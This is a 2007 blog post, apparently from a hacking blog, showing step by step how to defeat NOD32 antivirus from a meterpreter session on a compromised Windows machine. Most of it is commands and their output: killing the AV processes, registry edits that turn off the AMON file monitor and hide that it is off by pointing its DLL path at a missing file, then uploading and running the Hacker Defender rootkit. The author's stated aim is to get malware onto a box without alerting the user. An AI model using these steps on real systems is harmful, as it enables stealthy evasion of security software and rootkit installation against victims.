Friday, June 29, 2007

Defeating NOD32 AV


Ok I am going to claim victory over NOD32 but only on a technicality. But hey, I aint proud, I'll take it.

so if you upload any malware, nod32 like a good AV, will give you an alert (that's good)

meterpreter > upload hxdef100.exe hxdef100.exe

[*] uploading : hxdef100.exe -> hxdef100.exe

[*] uploaded : hxdef100.exe -> hxdef100.exe

meterpreter > ls


Listing: C:\WINDOWS\help\hxdef
==============================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir Wed Dec 31 17:00:00 MST 1969 .
40777/rwxrwxrwx 0 dir Wed Dec 31 17:00:00 MST 1969 ..



NOD32 AV alerting on Hacker Defender

NOD32 has srvhost restart itself immediately if you kill the process which is a real bummer.

meterpreter > run killav
[*] Killing Antivirus services on the target...
[*] Killing off nod32kui.exe...

[*] Killing off nod32krn.exe...

or if you kill the process with PS

meterpreter > ps

Process list
============

PID Name Path
--- ---- ----
372 smss.exe \SystemRoot\System32\smss.exe
588 csrss.exe \??\C:\WINDOWS\system32\csrss.exe
616 winlogon.exe \??\C:\WINDOWS\system32\winlogon.exe
664 services.exe C:\WINDOWS\system32\services.exe
676 lsass.exe C:\WINDOWS\system32\lsass.exe
840 svchost.exe C:\WINDOWS\system32\svchost.exe
948 svchost.exe C:\WINDOWS\System32\svchost.exe
1128 svchost.exe C:\WINDOWS\System32\svchost.exe
1152 svchost.exe C:\WINDOWS\System32\svchost.exe
1332 spoolsv.exe C:\WINDOWS\system32\spoolsv.exe
1616 Explorer.EXE C:\WINDOWS\Explorer.EXE
1760 VMwareTray.exe C:\Program Files\VMware\VMwareTray.exe
1768 VMwareUser.exe C:\Program Files\VMware\VMwareUser.exe
1852 sqlmangr.exe C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlmangr.exe
1892 inetinfo.exe C:\WINDOWS\System32\inetsrv\inetinfo.exe
1920 sqlservr.exe C:\PROGRA~1\MICROS~2\MSSQL\binn\sqlservr.exe
312 VMwareService.exe C:\Program Files\VMware\VMwareService.exe
2088 nod32krn.exe C:\Program Files\Eset\nod32krn.exe

meterpreter > kill 2088
Killing: 2088

meterpreter > ps

Process list
============

PID Name Path
--- ---- ----
348 smss.exe \SystemRoot\System32\smss.exe
580 csrss.exe \??\C:\WINDOWS\system32\csrss.exe
604 winlogon.exe \??\C:\WINDOWS\system32\winlogon.exe
656 services.exe C:\WINDOWS\system32\services.exe
668 lsass.exe C:\WINDOWS\system32\lsass.exe
832 svchost.exe C:\WINDOWS\system32\svchost.exe
940 svchost.exe C:\WINDOWS\System32\svchost.exe
1116 svchost.exe C:\WINDOWS\System32\svchost.exe
1168 svchost.exe C:\WINDOWS\System32\svchost.exe
1324 spoolsv.exe C:\WINDOWS\system32\spoolsv.exe
1616 Explorer.EXE C:\WINDOWS\Explorer.EXE
1724 VMwareTray.exe C:\Program Files\VMware\VMwareTray.exe
1736 VMwareUser.exe C:\Program Files\VMware\VMwareUser.exe
1792 sqlmangr.exe C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlmangr.exe
1916 inetinfo.exe C:\WINDOWS\System32\inetsrv\inetinfo.exe
1944 sqlservr.exe C:\PROGRA~1\MICROS~2\MSSQL\binn\sqlservr.exe
288 VMwareService.exe C:\Program Files\VMware\VMwareService.exe
3880 nod32krn.exe C:\Program Files\Eset\nod32krn.exe
1568 cmd.exe C:\WINDOWS\system32\cmd.exe
2404 regedit.exe C:\WINDOWS\regedit.exe


So how do we get malware on the box without alerting the user? and more specifically how do we get by the "AMON" which is the file monitor process.

NOD32 AV AMON file protection

I found that by editing some registry keys we can turn off the file protection.


meterpreter > reg
Usage: reg [command] [options]

Interact with the target machine's registry.

OPTIONS:

-d The data to store in the registry value.
-h Help menu.
-k The registry key path (E.g. HKLM\Software\Foo).
-t The registry value type (E.g. REG_SZ).
-v The registry value name (E.g. Stuff).

COMMANDS:

enumkey Enumerate the supplied registry key [-k ]
createkey Create the supplied registry key [-k ]
deletekey Delete the supplied registry key [-k ]
setval Set a registry value [-k -v -d ]
deleteval Delete the supplied registry value [-k -v ]
queryval Queries the data contents of a value [-k -v ]

meterpreter > reg enumkey -k HKLM\\Software\\eset\\nod\\currentversion\\modules\\AMON\\settings\\Config000\\Settings
Enumerating: HKLM\Software\eset\nod\currentversion\modules\AMON\settings\Config000\Settings

Values (23):

SP
enabled
check_on_open
check_on_rename
check_on_execute
check_on_create
quarantine_on_create
cache_enable
media_floppies
media_network
media_local
boot_on_access
boot_on_shutdown
sec_clean
sec_delete
sec_rename
sec_exclude
sec_replace
manualstop_enabled
autorun_dynamic
autoupd_notify
exc
exc_num

meterpreter > reg queryval -k HKLM\\Software\\eset\\nod\\currentversion\\modules\\AMON\\settings\\Config000\\Settings -v enabled
Key: HKLM\Software\eset\nod\currentversion\modules\AMON\settings\Config000\Settings
Name: enabled
Type: REG_DWORD
Data: 1

meterpreter > reg setval -k HKLM\\Software\\eset\\nod\\currentversion\\modules\\AMON\\settings\\Config000\\Settings -v enabled -d 0
Successful set enabled.
meterpreter > reg queryval -k HKLM\\SYSTEM\\CurrentControlSet\\Services\\AMON -v startKey: HKLM\SYSTEM\CurrentControlSet\Services\AMON
Name: start
Type: REG_DWORD
Data: 2

meterpreter > reg setval -k HKLM\\SYSTEM\\CurrentControlSet\\Services\\AMON -v start -t REG_DWORD -d "3"
Successful set start.
meterpreter > reg queryval -k HKLM\\SYSTEM\\CurrentControlSet\\Services\\AMON -v startKey: HKLM\SYSTEM\CurrentControlSet\Services\AMON
Name: start
Type: REG_DWORD
Data: 3


But if you disable AMON, your icon in the taskbar turns red and its grayed out in the control center of the AV (thats no good)

So to prevent that, we can change the registry key that loads the amon dll file. we change it so that NOD32 cant find that library, if it cant find the library it quitely loads the rest and doest provide any indication to the user that there is a problem, if you are looking for the AMON service you wont see it but it you arent looking for it you probably wont notice a problem.

meterpreter > reg queryval -k HKLM\\Software\\eset\\nod\\currentversion\\modules\\AMON -v filenameKey: HKLM\Software\eset\nod\currentversion\modules\AMON Name: filename Type: REG_SZ Data: C:\Program Files\Eset\ps_amon.dll
meterpreter > reg setval -k HKLM\\Software\\eset\\nod\\currentversion\\modules\\AMON -v filename -t REG_SZ -d "C:\\Program Files\\Eset\\ps_amon1.dll"
Successful set filename.

meterpreter > reg queryval -k HKLM\\Software\\eset\\nod\\currentversion\\modules\\AMON -v filenameKey: HKLM\Software\eset\nod\currentversion\modules\AMON
Name: filename
Type: REG_SZ
Data: C:\Program Files\Eset\ps_amon1.dll



meterpreter > upload hxdef100.exe hxdef100.exe
[*] uploading : hxdef100.exe -> hxdef100.exe
[*] uploaded : hxdef100.exe -> hxdef100.exe
meterpreter > upload hxdef100.ini hxdef100.ini
[*] uploading : hxdef100.ini -> hxdef100.ini
[*] uploaded : hxdef100.ini -> hxdef100.ini
meterpreter > execute -f hxdef100.exe
Process 204 created.

All done :-)
CG

1 comment:

Anonymous said...

As far as I can see the thing you did requires restart :) why don't you try
without restart ?

mmimmi@abv.bg